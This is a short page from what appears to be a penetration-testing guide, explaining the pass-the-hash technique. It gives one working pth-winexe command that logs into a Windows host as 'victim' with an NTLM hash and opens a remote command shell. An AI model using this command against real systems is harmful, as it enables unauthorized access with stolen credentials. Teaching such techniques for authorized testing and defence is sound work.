> For the complete documentation index, see [llms.txt](https://docs.particle42.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://docs.particle42.com/passwords/password-cracking/using-hashes-directly.md).

# Using Hashes Directly

As discussed in the previous section one of the methods is to use the hashes directly with the application/operating system instead of trying to crack them.&#x20;

The following tool can be used to pass the hash directly to Windows to login to the Operating System,

```
pth-winexe -U victim%aad3b435b51404eeaad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e //192.168.1.1 cmd
```
